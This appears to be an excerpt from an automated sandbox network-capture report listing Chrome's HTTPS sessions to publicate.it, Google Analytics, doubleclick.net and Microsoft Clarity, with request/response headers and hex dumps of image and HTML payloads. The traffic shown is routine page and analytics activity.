                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 2c 05 05 df eb a9 f1 42 e5 2d 7f e9 79 10 1e fc 0e 88 0f dc 09 b0 f6 7e 50 3e 78 4f db 7b e9 b0 0c 06 cc 71 b4 f8 90 d2 72 79 24 33 02 dc cf 1f 1d 22 aa d5 13 13 af fe 4d 40 c4 01 01 55 bc a9 5f a2 81 29 48 15 80 2c 3e 51 fb 1b fd d1 61 d7 cd 03 65 d6 f5 e0 31 77 d5 54 81 72 30 0b 30 3b ab 0b 98 1b 00 8e 1c b2 8e f0 de ce 03 49 c0 0d 3e 1e 0b e3 74 39 98 13 99 ae f2 3c 54 c4 01 49 32 88 5e ff 2a 93 7a c2 91 51 c0 56 de ef 34 ec 02 69 15 5b 27 e3 e8 61 89 a3 55 ad 00 5f 67 f4 fd 40 cc 66 50 8e 1d 01 a8 28 55 53 01 8b 8b 57 f3 bd 7c fa 14 48 87 0f 01 dc ba dc 7e 24 68 40 b2 64 ee 03 7e ae 00 e0 d0 7e ba c5 c7 f1 67 14 15 82 82 c4 82 ea 6a 60 a1 58 f5 4c 9d e6 b8 e9 d5 88 3a e3 b3 4f 80 1f 3e a8 46 09 36 09 f5 d3 84 c9 54 dc db d5 27 74 ec 0c 8f 55 41 a1 29
                                                                                                                                                                                                        Data Ascii: ,B-y~P>xO{qry$3"M@U_)H,>Qae1wTr00;I>t9<TI2^*zQV4i['aU_g@fP(USW|H~$h@d~~gj`XL:O>F6T'tUA)
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 22 a5 86 a0 60 10 c6 4f 52 b5 94 bb 46 1c 90 14 45 31 7b 2d 2d 20 bb c5 3b 56 da 7f 11 47 9d b2 77 37 48 95 15 97 bb 86 14 96 f7 7d ae 76 fd d4 6e 9f ad 51 38 9e 31 13 d8 e4 6b 40 29 3c ab 3a 4d f3 71 d4 54 03 27 c5 4d ad 6a 74 a4 25 e6 b2 ca 56 9d 8e 11 09 aa 2b d4 c8 24 1f c5 88 b3 60 11 40 e4 08 b5 25 ce 50 94 a9 15 05 35 c2 88 9c a4 e4 3b 81 26 40 4c 41 00 61 e1 d6 f5 48 38 8e 9a 87 63 29 cc f0 73 28 8c 73 ac 48 18 7d 3e 86 71 16 1c 7a 45 73 4c 2d ab e9 9e 0a 22 0f f9 63 ff 57 20 62 84 51 e8 c2 1c 82 ce 51 c3 b0 a0 10 95 10 4a 78 38 48 ff f9 1c c0 c2 5b ac fd 95 ce c1 e6 89 aa 0e 39 20 59 da e5 46 6f 90 40 42 86 ca d4 4e 8e 4f b0 f7 c9 c0 cf 9f 03 e5 f8 91 9e 27 82 a2 48 d9 ba 11 c4 ff 7c ae e7 88 c1 51 c1 16 2f 05 19 6b 7a 09 73 ae 26 12 50 ee c4 cf
                                                                                                                                                                                                        Data Ascii: "`ORFE1{-- ;VGw7H}vnQ81k@)<:MqT'Mjt%V+$`@%P5;&@LAaH8c)s(sH}>qzEsL-"cW bQQJx8H[9 YFo@BNO'H|Q/kzs&P
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: dd 33 c3 cc 08 73 c2 be 8b 08 39 39 b9 5f 61 19 a1 7f 65 68 98 19 61 4e d8 77 46 5e f5 9e ab dc 6f f2 33 27 24 27 5d ab bb 67 f8 d8 e9 bc 33 47 27 8e 1f 37 b7 2b 22 58 9b 7d cd 69 b2 0b 57 f4 74 1b dc 46 58 13 e6 5d 45 1b 74 5c 46 6f 69 6d 4a d7 75 c2 30 d2 07 8d cd 2a e6 1d 4f 2f 4f d3 ff 65 5a da 57 e6 06 73 8b ee a2 e1 61 0d 66 73 0b 61 0e 36 d5 99 7f 67 95 76 e4 d8 c9 37 af 9d 32 71 a5 3e d7 e2 d0 36 ea d1 1c 3d 91 bb 7d fa 35 93 bf d7 23 22 90 99 cd e6 77 ea eb cd ba a7 86 b8 11 c6 84 b5 ed ba 2b 88 f0 f3 a7 9f d8 5b 53 5b 5b ae bb 6a 68 1b 61 4c 58 db 23 82 2a 18 33 32 32 e4 da ba fa 77 2d 16 8b ee ad 21 6a 84 2d 61 4c 58 db 62 df a3 a7 5c 5d 57 fd 4e 6d 5d 83 ee b1 21 6a 48 02 15 e3 ee eb 7b 10 61 f1 82 05 27 2a ab aa b3 75 97 0d 4d ab ac aa c9 26
                                                                                                                                                                                                        Data Ascii: 3s99_aehaNwF^o3'$']g3G'7+"X}iWtFX]Et\FoimJu0*O/OeZWsafsa6gv72q>6=}5#"w+[S[[jhaLX#*322w-!j-aLXb\]WNm]!jH{a'*uM&
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC628INData Raw: 08 40 df 40 a2 2f 9f 5c 2c 29 59 b7 70 61 6a 56 3f 00 cf 9d 75 16 45 27 e0 f7 07 19 20 35 35 55 fa cd 6f 7e 7f 5f 44 54 f8 4f 47 44 45 8e 0d 0e 32 0d 69 02 d0 17 52 e9 bb 88 55 15 d5 2f 3d fb ec d3 ef a4 a5 a5 59 34 96 7d 5e 21 81 23 22 f4 17 19 7a bc 96 92 92 22 6c d8 f0 e7 3b c3 23 c2 9f 8c 89 8e 9a 14 12 12 34 a4 08 40 f3 13 94 96 55 9c aa ae aa 5e ff f8 e3 ff be 23 3b 3b 5b 71 01 2c af 91 a0 13 08 01 ec 4f 82 ee 2d 32 f4 fa 5a 44 44 04 ec d8 f1 d1 d2 f0 c8 c8 27 23 23 c2 53 42 91 10 92 34 38 45 a5 75 ce a2 06 a0 59 68 aa 2b 2b d7 a3 06 f8 a4 aa aa ca 15 d0 bd 4e 82 ce aa 41 8b 58 74 97 18 ee 6e d7 f5 7c e7 ae 5d 53 a2 23 63 ee 0d 0b 0b 59 19 16 1a 3a 22 38 d8 04 03 fd fa 05 5d 17 a0 29 ec 68 f6 b2 9a 9a ba ed 65 95 a5 5b 97 2d 59 72 42 23 30 dc 83 e4
                                                                                                                                                                                                        Data Ascii: @@/\,)YpajV?uE' 55Uo~_DTOGDE2iRU/=Y4}^!#"z"l;#4@U^#;;[q,O-2ZDD'##SB48EuYh++NAXtn|]S#cY:"8])he[-YrB#0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        85192.168.2.549863104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1036OUTGET /images/Trustpilot_logo.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 5816
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "16b8-620aa1d0eb27a"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qpis9MzF%2FrCVCp9FnzSFBBfvWaBjDlGPckvZw50r%2BuM1BAcxbmf5fkWYMC346f17jYxg2cLIbUW78nlUM%2BLTqenxlNP6aWq9dvofRLgOH%2BZgWzPSR0MFIAcwmXq5%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c65b308cda-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC619INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 aa 00 00 00 2e 08 06 00 00 00 b8 57 82 4c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 38 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 02 a0 02 00 04 00 00 00 01 00 00 00 aa a0 03 00 04 00 00 00 01 00 00 00 2e 00 00 00 00 b8 de ea 19 00 00 16 2b 49 44 41 54 78 01 ed 9c 09 98 54 d5 95 c7 df 52 d5 7b d3 0d 34 0d 34 0d 22 a0 01 51 a3 e0 9a 91 cd 6d 04 45 44 03 93 cf cc 37 9a 8c 5b 5c 32 43 34 1a 71 be d8 71 1c 31 9a 38 c6 6f cc 44 27 7e 32 46 c7 a5 05 14 8c 6b 8c 8c 18 45 45 1d 30 88 2c b2 76 37 6b b3 34 4d 53 dd 55 f5 de fc fe af eb 15 d5 45 75 77 75 53 b8 d6 e5 bb 7d ee 72 ee 39 e7 9e 7b ee b9 db 2b 0c 23 1b b2 1a c8 6a 20 ab 81 ac 06 be a4
                                                                                                                                                                                                        Data Ascii: PNGIHDR.WLgAMAa8eXIfMM*i.+IDATxTR{44"QmED7[\2C4qq18oD'~2FkEE0,v7k4MSUEuwuS}r9{+#j
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 43 33 54 d7 30 23 86 31 c9 35 ad 94 74 28 37 1c d7 39 ef aa 25 3c 06 64 43 56 03 87 a0 01 73 e2 8b 55 3d 82 61 a3 28 90 db e2 1a fb d2 a7 14 ca cb 71 73 0d a3 87 19 71 5e 37 03 56 a5 13 65 a9 4f 0a a6 e9 5d 54 ed 30 5b 22 7f 0b 7e 5d 5e a8 a5 ed 46 36 09 bf 4d b6 d0 30 22 56 8e 69 ec 6f da 3b 7f ca 3d 7b 13 ea 72 ca ca ca 7a 27 e4 bb 9c b4 6d 3b ba 75 eb d6 1d 34 3c 58 e8 2e 53 fb 5a 35 08 f6 e9 d3 a7 37 87 61 6f 9c 76 ec d8 b1 93 de 35 ab 87 25 25 25 3d 83 c1 a0 f7 da 18 0e 87 43 7b f6 ec d9 f5 79 f6 3c 50 10 0e 1f ed d8 39 67 99 d1 bc 72 b7 90 f5 3a cd a1 2b 30 cc a8 eb 3a 95 8e 65 f4 c3 6d a6 94 59 a7 7f 8c b5 cc 2c c8 b9 a5 c0 b5 d6 3b f9 b9 76 4a c4 e4 42 fc b3 c5 bf 9c 96 e8 ce a8 95 fb 47 aa 97 11 3d 26 e5 e5 e5 03 03 81 c0 8f 92 9b 74 25 ef 38 ce
                                                                                                                                                                                                        Data Ascii: C3T0#15t(79%<dCVsU=a(qsq^7VeO]T0["~]^F6M0"Vio;={rz'm;u4<X.SZ57aov5%%%=C{y<P9gr:+0:emY,;vJBG=&t%8
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: a2 7d fb f6 3d 40 9d 8c d2 80 ce ed a4 35 c1 fe 9e 38 0c 5a a5 e0 59 f4 bb 09 b8 99 ba f7 90 e9 69 26 d3 62 f2 ad 84 49 70 98 19 02 ee 83 24 75 3b 63 62 40 37 63 f4 ef 92 4e 27 e4 42 73 1c fd 9c 0a f2 09 c0 be d0 e2 92 b1 75 e2 22 d7 36 ca 96 41 73 3e 13 f5 4f fe 89 7e c0 80 01 ea db 03 e0 ca 83 8e 24 ad 26 ea f3 28 c0 6c a5 15 da 35 54 55 3e 37 b5 6a 37 9f f0 55 bb 05 c7 d5 46 0c e7 32 4e ed 53 b8 c3 2f 3b 14 63 e5 9b 55 49 be 9b 4d e9 82 a8 13 fd ef f2 01 95 6f 3e 7c d2 d5 ed 2d c3 12 23 e3 01 65 8c 22 fa c6 a7 4d fb 24 f2 ff 80 72 e4 55 3d 7e 18 81 37 bb 29 d3 56 62 8c 0a d1 e5 46 af 32 c5 1f f0 8e f1 f1 48 8b 88 37 49 e4 a9 19 a4 1b c8 5f 46 ac 8c 35 6d 00 47 46 a3 bd e0 d0 58 1c 4d fb 11 0c dc cc da da da 77 68 23 43 93 51 6a 82 24 4e 38 95 97 ab 8c
                                                                                                                                                                                                        Data Ascii: }=@58ZYi&bIp$u;cb@7cN'Bsu"6As>O~$&(l5TU>7j7UF2NS/;cUIMo>|-#e"M$rU=~7)VbF2H7I_F5mGFXMwh#CQj$N8
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: c8 5a 26 c8 ba f6 88 50 57 c3 a4 d0 b8 cb 50 15 46 b4 82 ce ff a6 ed 51 ab f8 92 7f a9 61 e8 aa 8a 2b aa 76 08 d3 6d 93 6b 81 16 3c e7 ee 75 35 c6 9e 4d 9b 8d 70 28 6c 94 0c ea 6f e4 96 16 1b 79 25 45 46 7e 59 a9 19 cc cb 1d 8b 72 66 33 70 69 b8 e6 76 78 65 ae 78 63 2a 0f 90 29 f2 2c f1 75 1c 1c ee 62 40 b7 c7 96 dc 23 e8 7b 1f fa 5e 4e d4 ed 83 4b 5d 3d 60 13 f9 0f 19 c8 27 30 d6 ff 85 7f 7b 5a ee 54 34 e8 78 87 a3 f6 10 99 10 5b 99 20 be a1 ea d9 b9 57 7b b8 9d 95 23 b7 56 09 0f 8d b4 f6 22 1d 6d 21 f8 90 c9 ad f5 f1 81 3d c0 57 e3 4e ed 20 6d 43 7d ff a4 50 09 1f f6 71 f9 df 2a 94 27 59 e2 1f 9d e8 91 c2 89 44 6a 42 bb 1b 2a b8 c2 b2 4b 06 55 60 9c c5 46 4e 51 81 11 2c cc e7 9b 17 9b a5 df 36 9c 48 74 cc 94 f9 b7 e9 aa c4 db 9b 24 92 f9 02 d2 87 7d bf
                                                                                                                                                                                                        Data Ascii: Z&PWPFQa+vmk<u5Mp(loy%EF~Yrf3pivxexc*),ub@#{^NK]=`'0{ZT4x[ W{#V"m!=WN mC}Pq*'YDjB*KU`FNQ,6Ht$}
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1090INData Raw: d1 cf e3 f4 e9 68 d2 57 11 73 90 4b 77 ab c3 e8 f7 6e 78 69 55 d1 d7 5b 03 80 da 83 eb bd f7 51 f0 1f 21 1d 5f 45 48 eb a1 e3 7d 26 ce e5 4a 83 2f 8f 7a 03 b8 da 7a 05 da 13 4a b8 5e 98 f6 4c 55 2f d3 75 c7 e3 d7 51 bf f7 0e 3c 9b 63 c3 75 fc 9f 7d 0b e6 5d 5c d5 be 91 fa 04 80 f3 2e 9e 55 bf ab de 7a 25 e8 46 af e7 87 2b bf 83 d6 7e 0d a5 e3 ba 67 af 3c 31 d8 27 01 f5 90 92 74 4a 1d 97 d1 f8 31 e5 04 40 09 ba 80 6f 8e e1 b6 51 56 b2 00 f2 18 28 fd 36 da bc 43 9d de ea f5 79 de d1 44 19 db 71 44 5d 2d dd 22 25 fb 34 81 f1 2b 1a 9e 07 f5 b5 92 3c c3 ef 88 db 48 cb 30 b5 0c 9e 18 8b 7a 7a d4 3b 7f 0d f5 fa 8a e8 16 bc a4 d2 f1 40 bd 56 9d 79 c4 46 f0 e4 3d fb 51 36 10 58 4c 6c 13 a8 d7 12 fc aa e8 00 c5 db 93 95 3e 48 56 df 48 d7 51 5f 45 dd 43 34 0e 25 10
                                                                                                                                                                                                        Data Ascii: hWsKwnxiU[Q!_EH}&J/zzJ^LU/uQ<cu}]\.Uz%F+~g<1'tJ1@oQV(6CyDqD]-"%4+<H0zz;@VyF=Q6XLl>HVHQ_EC4%


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        86192.168.2.549859216.58.212.1424436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1303OUTPOST /g/collect?v=2&tid=G-8ML5ENYGMT&gtm=45je48s0v887450065z8850968419za200zb850968419&_p=1725034578026&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=0&cid=1381680606.1725034579&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=1&sid=1725034582&sct=1&seg=0&dl=https%3A%2F%2Fpublicate.it%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&dt=Publicate%20%7C%20HTML%20Email%20Template%20Builder&en=page_view&_fv=1&_ss=1&tfd=6253 HTTP/1.1
                                                                                                                                                                                                        Host: analytics.google.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC446INHTTP/1.1 204 No Content
                                                                                                                                                                                                        Access-Control-Allow-Origin: https://publicate.it
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        87192.168.2.549867142.250.186.664436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC962OUTGET /td/ga/rul?tid=G-JL3QGDSQZ4&gacid=1381680606.1725034579&gtm=45je48s0v874630860z8850968419za200zb850968419&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=417783928 HTTP/1.1
                                                                                                                                                                                                        Host: td.doubleclick.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                        P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 30-Aug-2024 16:31:24 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: d<html></html>
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        88192.168.2.549866142.250.186.664436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC963OUTGET /td/ga/rul?tid=G-8ML5ENYGMT&gacid=1381680606.1725034579&gtm=45je48s0v887450065z8850968419za200zb850968419&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=1212565528 HTTP/1.1
                                                                                                                                                                                                        Host: td.doubleclick.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                        P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 30-Aug-2024 16:31:24 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: d<html></html>
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        89192.168.2.54986113.107.246.454436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC533OUTGET /tag/kuemlmuzvn?ref=gtm2 HTTP/1.1
                                                                                                                                                                                                        Host: www.clarity.ms
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: application/x-javascript
                                                                                                                                                                                                        Content-Length: 637
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Set-Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830; expires=Sat, 30 Aug 2025 16:16:24 GMT; path=/; secure; samesite=none; httponly
                                                                                                                                                                                                        Request-Context: appId=cid-v1:3f60b293-70d6-4805-b0bb-3484f0a73bf0
                                                                                                                                                                                                        x-azure-ref: 20240830T161624Z-16579567576mj4tc2xukwvxfxc00000003e0000000006y56
